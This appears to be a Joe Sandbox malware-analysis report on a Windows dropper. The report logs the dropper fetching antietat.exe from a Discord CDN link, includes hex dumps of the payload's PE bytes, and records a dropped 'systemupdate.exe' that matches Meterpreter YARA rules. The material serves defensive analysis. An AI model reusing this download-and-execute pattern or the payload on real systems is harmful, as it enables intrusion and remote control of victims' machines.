2024-12-05 10:41:18 UTC	1369	IN	Data Raw: 00 00 00 e8 a4 64 00 00 48 83 f8 01 74 2a 48 85 c0 0f 84 14 ff ff ff b9 0b 00 00 00 ff d0 e9 3d ff ff ff 66 0f 1f 84 00 00 00 00 00 b9 08 00 00 00 ff d0 e9 28 ff ff ff ba 01 00 00 00 b9 0b 00 00 00 e8 65 64 00 00 e9 14 ff ff ff ba 01 00 00 00 b9 04 00 00 00 e8 51 64 00 00 e9 00 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 3d 64 00 00 e8 98 f8 ff ff e9 e7 fe ff ff 90 90 90 66 2e 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 41 54 55 57 56 53 48 83 ec 20 4c 8d 25 4f bf 00 00 4c 89 e1 ff 15 ee d0 00 00 48 8b 1d 1f bf 00 00 48 85 db 74 3e 48 8b 2d 1b d1 00 00 48 8b 3d dc d0 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 8b 0b ff d5 48 89 c6 ff d7 48 85 f6 74 0d 85 c0 75 09 48 8b 43 08 48 89 f1 ff d0 48 8b 5b 10 48 85 db 75 dc 4c 89 e1 48 83 c4 20 5b 5e 5f 5d 41 5c 48 ff Data Ascii: dHt*H=f(edQd=df.fDATUWVSH L%OLHHt>H-H=ff.HHtuHCHH[HuLH [^_]A\H
2024-12-05 10:41:18 UTC	1369	IN	Data Raw: 8d 54 d0 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f6 40 27 20 74 09 48 85 c9 74 b5 48 83 e9 01 48 83 c0 28 48 39 c2 75 e8 31 c0 c3 0f 1f 44 00 00 48 8b 05 c9 83 00 00 31 d2 66 81 38 4d 5a 75 0f 48 63 48 3c 48 01 c1 81 39 50 45 00 00 74 09 48 89 d0 c3 0f 1f 44 00 00 66 81 79 18 0b 02 48 0f 44 d0 48 89 d0 c3 66 2e 0f 1f 84 00 00 00 00 00 48 8b 15 89 83 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 48 29 d1 45 0f b7 48 06 41 0f b7 50 14 49 8d 54 10 18 66 45 85 c9 74 d7 41 8d 41 ff 48 8d 04 80 4c 8d 4c c2 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 42 0c 4c 89 c0 4c 39 c1 72 08 03 42 08 48 39 c1 72 0c 48 83 c2 28 49 39 d1 75 e3 31 c0 c3 8b 42 24 f7 d0 c1 e8 1f c3 0f 1f 80 Data Ascii: T(ff.@@' tHtHH(H9u1DH1f8MZuHcH<H9PEtHDfyHDHf.H1f:MZuLcB<IA8PEtfAxuH)EHAPITfEtAAHLL(f.DBLL9rBH9rH(I9u1B$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49735	162.159.134.233	443	1860	C:\Users\user\Desktop\sNifdpWiY9.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 10:41:26 UTC	417	OUT	GET /attachments/1178810474935111690/1314097351127732274/antietat.exe?ex=67528807&is=67513687&hm=a879d235e0e9ab42197adebd30a1dcd38e7d3ff1d570a766b4b5ac7a476e8dc7& HTTP/1.1 User-Agent: Downloader Host: cdn.discordapp.com Cache-Control: no-cache Cookie: __cf_bm=ec5D3vqvcYkHylRue0pxuS5y.qSxwzx5F44uAeM_tlU-1733395264-1.0.1.1-3HmJ6Tymd8lVskob.cAkdkVngbFD1ogfEIC2S0zCnxMxRPFV0QhHzPHI0ndeQ9WOjh3LZicE5C78Ta1eaUIi_A
2024-12-05 10:41:26 UTC	1263	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 10:41:26 GMT Content-Type: application/x-msdos-program Content-Length: 46592 Connection: close CF-Ray: 8ed36c7b0a524382-EWR CF-Cache-Status: HIT Accept-Ranges: bytes, bytes Age: 13446 Cache-Control: public, max-age=31536000 Content-Disposition: attachment; filename="antietat.exe" ETag: "2eddba95f5818ef402bfe7fbaa0f6a18" Expires: Fri, 05 Dec 2025 10:41:26 GMT Last-Modified: Thu, 05 Dec 2024 05:13:43 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1733375623321737 x-goog-hash: crc32c=C+Z3jw== x-goog-hash: md5=Lt26lfWBjvQCv+f7qg9qGA== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 46592 x-guploader-uploadid: AFiumC5KewGqCdjqrDiVmKhof3L_YhJd69mxK8gUrus2hdwbkNR2Kd9X2RkSjYVGnr87jIWq51Q X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jH5PF3wBoLW5yEu4HF3yUEb2K2TkMGrBQTZv6%2BPMMAevunuqDZiCyNvpjnCtfeUs13LeAEyq%2B4U1XlAvecowVYVegP82el5TIHe1MrpVYgHzRwu9kLM3R5e1nRyI%2FUkTkGhxHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
2024-12-05 10:41:26 UTC	184	IN	Data Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 44 5a 79 57 6a 76 6e 45 36 6f 79 51 6d 79 4f 69 46 6c 72 4c 71 49 54 2e 76 64 58 6b 53 6b 53 70 4e 62 58 47 69 61 4b 30 69 67 4d 2d 31 37 33 33 33 39 35 32 38 36 33 30 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: Set-Cookie: _cfuvid=DZyWjvnE6oyQmyOiFlrLqIT.vdXkSkSpNbXGiaK0igM-1733395286301-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
2024-12-05 10:41:26 UTC	1291	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 04 fb 50 67 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 2b 00 7a 00 00 00 b2 00 00 00 0c 00 00 e0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 40 01 00 00 04 00 00 e1 cf 00 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdPg.+z@@`
2024-12-05 10:41:26 UTC	1369	IN	Data Raw: 0f 1f 44 00 00 83 78 74 0e 0f 86 40 ff ff ff 44 8b 80 e8 00 00 00 31 c9 45 85 c0 0f 95 c1 e9 2c ff ff ff 66 90 48 83 ec 38 48 8b 05 b5 9a 00 00 4c 8d 05 d6 ce 00 00 48 8d 15 d7 ce 00 00 48 8d 0d d8 ce 00 00 8b 00 89 05 ac ce 00 00 48 8b 05 51 9a 00 00 44 8b 08 48 8d 05 9b ce 00 00 48 89 44 24 20 e8 75 73 00 00 90 48 83 c4 38 c3 0f 1f 80 00 00 00 00 41 54 55 57 56 53 48 83 ec 20 b8 30 00 00 00 65 67 48 8b 00 48 8b 70 08 48 8b 1d 91 99 00 00 48 8b 3d 3a e1 00 00 eb 18 0f 1f 84 00 00 00 00 00 48 39 c6 0f 84 5f 01 00 00 b9 e8 03 00 00 ff d7 31 c0 f0 48 0f b1 33 75 e7 31 ff 48 8b 35 6e 99 00 00 8b 06 83 f8 01 0f 84 ca 01 00 00 8b 06 85 c0 0f 84 69 01 00 00 c7 05 17 ce 00 00 01 00 00 00 8b 06 83 f8 01 0f 84 78 01 00 00 85 ff 0f 84 3c 01 00 00 48 8b 05 95 98 00 Data Ascii: Dxt@D1E,fH8HLHHHQDHHD$ usH8ATUWVSH 0egHHpHH=:H9_1H3u1H5nix<H
2024-12-05 10:41:26 UTC	1369	IN	Data Raw: 48 63 7e 3c 48 01 f7 81 3f 50 45 00 00 0f 85 bb 00 00 00 8b 57 50 41 b9 40 00 00 00 41 b8 00 30 00 00 31 c9 ff 15 62 dc 00 00 48 89 c5 48 85 c0 0f 84 b9 00 00 00 44 8b 47 54 48 89 f2 48 89 c1 45 31 e4 e8 04 6f 00 00 48 63 46 3c 66 83 7f 06 00 48 8d 9c 06 14 01 00 00 74 26 90 8b 0b 8b 53 08 41 83 c4 01 48 83 c3 28 44 8b 43 dc 48 01 e9 48 01 f2 e8 d4 6e 00 00 0f b7 47 06 44 39 e0 7f db 48 8d 0d ec 8a 00 00 e8 8f 11 00 00 8b 5f 28 48 8d 0d 0d 8b 00 00 48 01 eb 48 89 da e8 7a 11 00 00 48 8d 0d 2b 8b 00 00 e8 6e 11 00 00 ff d3 41 b8 00 80 00 00 31 d2 48 89 e9 ff 15 d3 db 00 00 31 c0 48 83 c4 20 5b 5e 5f 5d 41 5c c3 48 8d 0d 3f 8a 00 00 e8 42 11 00 00 b8 ff ff ff ff eb e2 48 8d 0d 04 8a 00 00 e8 2f 11 00 00 eb eb ff 15 57 db 00 00 48 8d 0d 38 8a 00 00 89 c2 e8 Data Ascii: Hc~<H?PEWPA@A01bHHDGTHHE1oHcF<fHt&SAH(DCHHnGD9H_(HHHzH+nA1H1H [^_]A\H?BH/WH8
2024-12-05 10:41:26 UTC	1369	IN	Data Raw: 00 48 8d 0d d3 89 00 00 89 c2 e8 64 fe ff ff 0f 1f 40 00 31 f6 e9 21 ff ff ff 48 8b 05 ca c4 00 00 8b 57 08 48 8d 0d 78 89 00 00 4c 8b 44 18 18 e8 3e fe ff ff 48 89 da 48 8d 0d 44 89 00 00 e8 2f fe ff ff 90 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 55 41 57 41 56 41 55 41 54 57 56 53 48 83 ec 48 48 8d 6c 24 40 44 8b 25 74 c4 00 00 45 85 e4 74 17 48 8d 65 08 5b 5e 5f 41 5c 41 5d 41 5e 41 5f 5d c3 66 0f 1f 44 00 00 c7 05 4e c4 00 00 01 00 00 00 e8 89 09 00 00 48 98 48 8d 04 80 48 8d 04 c5 0f 00 00 00 48 83 e0 f0 e8 d2 0b 00 00 4c 8b 2d 0b 8e 00 00 48 8b 1d 14 8e 00 00 48 29 c4 c7 05 1b c4 00 00 00 00 00 00 48 8d 44 24 30 48 89 05 13 c4 00 00 4c 89 e8 48 29 d8 48 83 f8 07 7e 90 48 83 f8 0b 0f 8f 5d 01 00 00 8b 03 85 c0 0f 85 5b 02 00 00 8b 43 04 85 c0 0f 85 Data Ascii: Hd@1!HWHxLD>HHD/ff.UAWAVAUATWVSHHHl$@D%tEtHe[^_A\A]A^A_]fDNHHHHL-HH)HD$0HLH)H~H][C
2024-12-05 10:41:26 UTC	1369	IN	Data Raw: 00 e8 a4 64 00 00 48 83 f8 01 74 2a 48 85 c0 0f 84 14 ff ff ff b9 0b 00 00 00 ff d0 e9 3d ff ff ff 66 0f 1f 84 00 00 00 00 00 b9 08 00 00 00 ff d0 e9 28 ff ff ff ba 01 00 00 00 b9 0b 00 00 00 e8 65 64 00 00 e9 14 ff ff ff ba 01 00 00 00 b9 04 00 00 00 e8 51 64 00 00 e9 00 ff ff ff ba 01 00 00 00 b9 08 00 00 00 e8 3d 64 00 00 e8 98 f8 ff ff e9 e7 fe ff ff 90 90 90 66 2e 0f 1f 84 00 00 00 00 00 66 0f 1f 44 00 00 41 54 55 57 56 53 48 83 ec 20 4c 8d 25 4f bf 00 00 4c 89 e1 ff 15 ee d0 00 00 48 8b 1d 1f bf 00 00 48 85 db 74 3e 48 8b 2d 1b d1 00 00 48 8b 3d dc d0 00 00 66 66 2e 0f 1f 84 00 00 00 00 00 90 8b 0b ff d5 48 89 c6 ff d7 48 85 f6 74 0d 85 c0 75 09 48 8b 43 08 48 89 f1 ff d0 48 8b 5b 10 48 85 db 75 dc 4c 89 e1 48 83 c4 20 5b 5e 5f 5d 41 5c 48 ff 25 b0 Data Ascii: dHt*H=f(edQd=df.fDATUWVSH L%OLHHt>H-H=ff.HHtuHCHH[HuLH [^_]A\H%
2024-12-05 10:41:26 UTC	1369	IN	Data Raw: d0 28 66 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 f6 40 27 20 74 09 48 85 c9 74 b5 48 83 e9 01 48 83 c0 28 48 39 c2 75 e8 31 c0 c3 0f 1f 44 00 00 48 8b 05 c9 83 00 00 31 d2 66 81 38 4d 5a 75 0f 48 63 48 3c 48 01 c1 81 39 50 45 00 00 74 09 48 89 d0 c3 0f 1f 44 00 00 66 81 79 18 0b 02 48 0f 44 d0 48 89 d0 c3 66 2e 0f 1f 84 00 00 00 00 00 48 8b 15 89 83 00 00 31 c0 66 81 3a 4d 5a 75 10 4c 63 42 3c 49 01 d0 41 81 38 50 45 00 00 74 08 c3 0f 1f 80 00 00 00 00 66 41 81 78 18 0b 02 75 ef 48 29 d1 45 0f b7 48 06 41 0f b7 50 14 49 8d 54 10 18 66 45 85 c9 74 d7 41 8d 41 ff 48 8d 04 80 4c 8d 4c c2 28 66 2e 0f 1f 84 00 00 00 00 00 44 8b 42 0c 4c 89 c0 4c 39 c1 72 08 03 42 08 48 39 c1 72 0c 48 83 c2 28 49 39 d1 75 e3 31 c0 c3 8b 42 24 f7 d0 c1 e8 1f c3 0f 1f 80 00 00 Data Ascii: (ff.@@' tHtHH(H9u1DH1f8MZuHcH<H9PEtHDfyHDHf.H1f:MZuLcB<IA8PEtfAxuH)EHAPITfEtAAHLL(f.DBLL9rBH9rH(I9u1B$

Target ID:	0
Start time:	05:41:01
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\sNifdpWiY9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sNifdpWiY9.exe"
Imagebase:	0x7ff75f8b0000
File size:	3'188'321 bytes
MD5 hash:	897699BDF92B6380FA7ABD4FDA6794CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:41:01
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:41:07
Start date:	05/12/2024
Path:	C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin
Imagebase:	0x7ff6ec320000
File size:	46'592 bytes
MD5 hash:	2EDDBA95F5818EF402BFE7FBAA0F6A18
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_Meterpreter, Description: Detects Meterpreter payload, Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Meterpreter, Description: Detects Meterpreter payload, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	05:41:07
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	05:41:15
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\sNifdpWiY9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sNifdpWiY9.exe"
Imagebase:	0x7ff75f8b0000
File size:	3'188'321 bytes
MD5 hash:	897699BDF92B6380FA7ABD4FDA6794CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:41:15
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:41:15
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\sNifdpWiY9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sNifdpWiY9.exe"
Imagebase:	0x7ff75f8b0000
File size:	3'188'321 bytes
MD5 hash:	897699BDF92B6380FA7ABD4FDA6794CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:41:15
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:41:23
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\sNifdpWiY9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sNifdpWiY9.exe"
Imagebase:	0x7ff75f8b0000
File size:	3'188'321 bytes
MD5 hash:	897699BDF92B6380FA7ABD4FDA6794CA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:41:23
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:41:23
Start date:	05/12/2024
Path:	C:\Users\user\Desktop\sNifdpWiY9.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\sNifdpWiY9.exe"
Imagebase:	0x7ff75f8b0000
File size:	3'188'321 bytes
MD5 hash:	897699BDF92B6380FA7ABD4FDA6794CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:41:24
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	22.7%
Total number of Nodes:	494
Total number of Limit Nodes:	54

Executed Functions

Function 00007FF75F8B1703 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 178
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF75F994540: strlen.MSVCRT ref: 00007FF75F994554

InternetOpenA.WININET ref: 00007FF75F8B178F
InternetOpenUrlA.WININET ref: 00007FF75F8B182D

Strings

[LOG] Attempting to download: , xrefs: 00007FF75F8B1728
Downloader, xrefs: 00007FF75F8B177E
[ERROR] Unable to open output file: , xrefs: 00007FF75F8B18D4
[ERROR] InternetOpenUrlA failed. Error code: , xrefs: 00007FF75F8B1840
[ERROR] InternetOpenA failed. Error code: , xrefs: 00007FF75F8B17A2
[LOG] Download completed: , xrefs: 00007FF75F8B19D0

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: InternetOpen$strlen
String ID: Downloader$[ERROR] InternetOpenA failed. Error code: $[ERROR] InternetOpenUrlA failed. Error code: $[ERROR] Unable to open output file: $[LOG] Attempting to download: $[LOG] Download completed:
API String ID: 3591113454-3788325054
Opcode ID: 4150dfb25dc468a77205aba2d7ce6da4f396dfc95426181c3301db9b7024c21f
Instruction ID: 8891b753d35d89388f64e66f676a0329e7ae2ecdd04bf852dee902807eabfcba
Opcode Fuzzy Hash: 4150dfb25dc468a77205aba2d7ce6da4f396dfc95426181c3301db9b7024c21f
Instruction Fuzzy Hash: F7814465B09BC688EF64FB56E8553F993A4AB49BC4F980036DD0CCB769DF2CE5408350

Function 00007FF75F8B11E7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF75F8B122B
malloc.MSVCRT ref: 00007FF75F8B125F
strlen.MSVCRT ref: 00007FF75F8B1284
malloc.MSVCRT ref: 00007FF75F8B1290
_initterm.MSVCRT ref: 00007FF75F8B1382

Strings

F, xrefs: 00007FF75F8B12E4

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled_inittermstrlen
String ID: F
API String ID: 3205526213-1003406523
Opcode ID: 48fca0f9c51ec6a392d4bba4af0d9eb527289d3536a5fbeef566240a0bc38ab3
Instruction ID: 769d2c2e51bc33e3f8d5ba2f299a6edb40b8a3fac28698498ed7ae561258d68d
Opcode Fuzzy Hash: 48fca0f9c51ec6a392d4bba4af0d9eb527289d3536a5fbeef566240a0bc38ab3
Instruction Fuzzy Hash: 25415E75E19A8285E740BF14E8592F9A351AF85780FDC4035DA0D8F7AADF3CB860D760

Function 00007FF75F944440 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF75F8D1CE0: _wmkdir.MSVCRT ref: 00007FF75F8D1CF0

_wmkdir.MSVCRT ref: 00007FF75F944540

Strings

cannot create directory, xrefs: 00007FF75F9444A5

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd

Similarity

API ID: _wmkdir
String ID: cannot create directory
API String ID: 2528713637-2555518002
Opcode ID: c54802518c9e7459e52cee22c7d1a9f28f8b812d38d202546b679d810c06a9cb
Instruction ID: df7560e12bd42fa4ce370a35678dae651370ba30613d28d134d5a5838a5c0e0e
Opcode Fuzzy Hash: c54802518c9e7459e52cee22c7d1a9f28f8b812d38d202546b679d810c06a9cb
Instruction Fuzzy Hash: AC318262E19EC245FA50BF69A4441F9E3A1BB95BC0F9C4030EE8D8735DEF2CE4418760

Function 00007FF75F8B14BE Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckTokenMembership.KERNELBASE ref: 00007FF75F8B155F

Memory Dump Source

Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true

